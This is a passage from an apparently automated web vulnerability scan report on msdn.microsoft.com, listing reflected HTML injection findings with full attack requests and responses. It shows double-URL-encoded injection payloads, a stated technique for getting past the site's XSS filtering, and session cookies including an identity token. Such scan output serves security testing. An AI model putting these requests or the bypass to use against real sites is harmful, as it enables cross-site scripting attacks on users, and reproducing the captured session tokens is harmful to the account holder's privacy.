There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryc36af%2522%253e%253ca%253e86108dcf880/dd582940(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:24 GMT
Content-Length: 9196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc36af"><a>86108dcf880/dd582940(office.11)" />
...[SNIP]...

2.80. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93bc5%2522%253e%253ca%253e7a158e741b3 was submitted in the REST URL parameter 3. This input was echoed as 93bc5"><a>7a158e741b3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582940(office.11).aspx93bc5%2522%253e%253ca%253e7a158e741b3 HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:54 GMT
Content-Length: 9206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582940(office.11).aspx93bc5"><a>7a158e741b3" />
...[SNIP]...

2.81. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/default(loband).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b717%2522%253e%253ca%253e026167f029 was submitted in the REST URL parameter 1. This input was echoed as 3b717"><a>026167f029 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us3b717%2522%253e%253ca%253e026167f029/library/default(loband).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us3b717"><a>026167f029/library/default(loband)" />
...[SNIP]...

2.82. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/default(loband).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a550a%2522%253e%253ca%253eae5fa62af7a was submitted in the REST URL parameter 2. This input was echoed as a550a"><a>ae5fa62af7a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarya550a%2522%253e%253ca%253eae5fa62af7a/default(loband).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya550a"><a>ae5fa62af7a/default(loband)" />
...[SNIP]...

2.83. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/default(loband).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b270%2522%253e%253ca%253e1e436389099 was submitted in the REST URL parameter 3. This input was echoed as 8b270"><a>1e436389099 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/default(loband).aspx8b270%2522%253e%253ca%253e1e436389099 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/default(loband).aspx8b270"><a>1e436389099" />
...[SNIP]...

2.84. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce0fb%2522%253e%253ca%253e210aa7e2390 was submitted in the REST URL parameter 1. This input was echoed as ce0fb"><a>210aa7e2390 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usce0fb%2522%253e%253ca%253e210aa7e2390/library/ee663300(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
